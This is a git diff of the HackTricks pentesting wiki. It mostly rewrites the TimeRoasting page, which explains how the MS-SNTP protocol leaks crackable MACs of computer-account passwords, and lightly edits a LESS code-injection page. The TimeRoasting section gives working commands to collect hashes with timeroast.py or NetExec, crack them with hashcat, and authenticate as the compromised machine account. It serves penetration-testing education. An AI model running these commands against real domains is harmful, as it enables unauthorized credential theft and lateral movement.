Add content from: HTB: RustyKey — Timeroast → Helpdesk abuse → 7‑Zip CLSID Hij...

HackTricks News Bot · HackTricks News Bot · commit 4b093d9ebb92 · 2025-11-08T18:32:40.000Z
diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
@@ -1,4 +1,6 @@
-## LESS Code Injection leading to SSRF & Local File Read
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive.  During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
 
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
 
 * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
 * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/TimeRoasting.md b/src/windows-hardening/active-directory-methodology/TimeRoasting.md
@@ -2,41 +2,66 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-timeRoasting, the main cause is the outdated authentication mechanism left by Microsoft in its extension to NTP servers, known as MS-SNTP. In this mechanism, clients can directly use any computer account's Relative Identifier (RID), and the domain controller will use the computer account's NTLM hash (generated by MD4) as the key to generate the **Message Authentication Code (MAC)** of the response packet.
+TimeRoasting abuses the legacy MS-SNTP authentication extension. In MS-SNTP, a client can send a 68-byte request that embeds any computer account RID; the domain controller uses the computer account's NTLM hash (MD4) as the key to compute a MAC over the response and returns it. Attackers can collect these MS-SNTP MACs unauthenticated and crack them offline (Hashcat mode 31300) to recover computer account passwords.
 
-Attackers can exploit this mechanism to obtain equivalent hash values of arbitrary computer accounts without authentication. Clearly, we can use tools like Hashcat for brute-forcing.
+See section 3.1.5.1 "Authentication Request Behavior" and 4 "Protocol Examples" in the official MS-SNTP spec for details.
+![](../../images/Pasted%20image%2020250709114508.png)
+When the ExtendedAuthenticatorSupported ADM element is false, the client sends a 68-byte request and embeds the RID in the least significant 31 bits of the Key Identifier subfield of the authenticator.
 
-The specific mechanism can be viewed in section 3.1.5.1 "Authentication Request Behavior" of the [official Windows documentation for MS-SNTP protocol](https://winprotocoldoc.z19.web.core.windows.net/MS-SNTP/%5bMS-SNTP%5d.pdf).
+> If the ExtendedAuthenticatorSupported ADM element is false, the client MUST construct a Client NTP Request message. The Client NTP Request message length is 68 bytes. The client sets the Authenticator field of the Client NTP Request message as described in section 2.2.1, writing the least significant 31 bits of the RID value into the least significant 31 bits of the Key Identifier subfield of the authenticator, and then writing the Key Selector value into the most significant bit of the Key Identifier subfield.
 
-In the document, section 3.1.5.1 covers Authentication Request Behavior.
-![](../../images/Pasted%20image%2020250709114508.png)
-It can be seen that when the ExtendedAuthenticatorSupported ADM element is set to `false`, the original Markdown format is retained.
+From section 4 (Protocol Examples):
 
->Quoted in the original article：
->>If the ExtendedAuthenticatorSupported ADM element is false, the client MUST construct a Client NTP Request message. The Client NTP Request message length is 68 bytes. The client sets the Authenticator field of the Client NTP Request message as described in section 2.2.1, writing the least significant 31 bits of the RID value into the least significant 31 bits of the Key Identifier subfield of the authenticator, and then writing the Key Selector value into the most significant bit of the Key Identifier subfield.
+> After receiving the request, the server verifies that the received message size is 68 bytes. Assuming that the received message size is 68 bytes, the server extracts the RID from the received message. The server uses it to call the NetrLogonComputeServerDigest method (as specified in [MS-NRPC] section 3.5.4.8.2) to compute the crypto-checksums and select the crypto-checksum based on the most significant bit of the Key Identifier subfield from the received message, as specified in section 3.2.5. The server then sends a response to the client, setting the Key Identifier field to 0 and the Crypto-Checksum field to the computed crypto-checksum.
 
-In document section 4 Protocol Examples point 3
+The crypto-checksum is MD5-based (see 3.2.5.1.1) and can be cracked offline, enabling the roasting attack.
 
->Quoted in the original article： 
->>3. After receiving the request, the server verifies that the received message size is 68 bytes. If it is not, the server either drops the request (if the message size does not equal 48 bytes) or treats it as an unauthenticated request (if the message size is 48 bytes). Assuming that the received message size is 68 bytes, the server extracts the RID from the received message. The server uses it to call the NetrLogonComputeServerDigest method (as specified in [MS-NRPC] section 3.5.4.8.2) to compute the crypto-checksums and select the crypto-checksum based on the most significant bit of the Key Identifier subfield from the received message, as specified in section 3.2.5. The server then sends a response to the client, setting the Key Identifier field to 0 and the Crypto-Checksum field to the computed crypto-checksum.
+## How to Attack
 
-According to the description in the Microsoft official document above, users do not need any authentication; they only need to fill in the RID to initiate a request, and then they can obtain the cryptographic checksum. The cryptographic checksum is explained in section 3.2.5.1.1 of the document.
+[SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort
 
->Quoted in the original article：
->>The server retrieves the RID from the least significant 31 bits of the Key Identifier subfield of the Authenticator field of the Client NTP Request message. The server uses the NetrLogonComputeServerDigest method (as specified in [MS-NRPC] section 3.5.4.8.2) to compute crypto-checksums with the following input parameters:
->>>![](../../images/Pasted%20image%2020250709115757.png)
+```bash
+sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt
+hashcat -m 31300 ntp-hashes.txt
+```
 
-The cryptographic checksum is calculated using MD5, and the specific process can be referred to in the content of the document. This gives us the opportunity to perform a roasting attack.
+---
 
-## how to attack
+## Practical attack (unauth) with NetExec + Hashcat
 
-Quote to https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-timeroasting/
+- NetExec can enumerate and collect MS-SNTP MACs for computer RIDs unauthenticated and print $sntp-ms$ hashes ready for cracking:
 
-[SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast) - Timeroasting scripts by Tom Tervoort
+```bash
+# Target the DC (UDP/123). NetExec auto-crafts per-RID MS-SNTP requests
+netexec smb <dc_fqdn_or_ip> -M timeroast
+# Output example lines: $sntp-ms$*<rid>*md5*<salt>*<mac>
+```
+
+- Crack offline with Hashcat mode 31300 (MS-SNTP MAC):
 
+```bash
+hashcat -m 31300 timeroast.hashes /path/to/wordlist.txt --username
+# or let recent hashcat auto-detect; keep RIDs with --username for convenience
 ```
-sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt
-hashcat -m 31300 ntp-hashes.txt
+
+- The recovered cleartext corresponds to a computer account password. Try it directly as the machine account using Kerberos (-k) when NTLM is disabled:
+
+```bash
+# Example: cracked for RID 1125 -> likely IT-COMPUTER3$
+netexec smb <dc_fqdn> -u IT-COMPUTER3$ -p 'RecoveredPass' -k
 ```
 
-{{#include ../../banners/hacktricks-training.md}}
+Operational tips
+- Ensure accurate time sync before Kerberos: `sudo ntpdate <dc_fqdn>`
+- If needed, generate krb5.conf for the AD realm: `netexec smb <dc_fqdn> --generate-krb5-file krb5.conf`
+- Map RIDs to principals later via LDAP/BloodHound once you have any authenticated foothold.
+
+## References
+
+- [MS-SNTP: Microsoft Simple Network Time Protocol](https://winprotocoldoc.z19.web.core.windows.net/MS-SNTP/%5bMS-SNTP%5d.pdf)
+- [Secura – Timeroasting whitepaper](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
+- [SecuraBV/Timeroast](https://github.com/SecuraBV/Timeroast)
+- [NetExec – official docs](https://www.netexec.wiki/)
+- [Hashcat mode 31300 – MS-SNTP](https://hashcat.net/wiki/doku.php?id=example_hashes)
+
+{{#include ../../banners/hacktricks-training.md}}
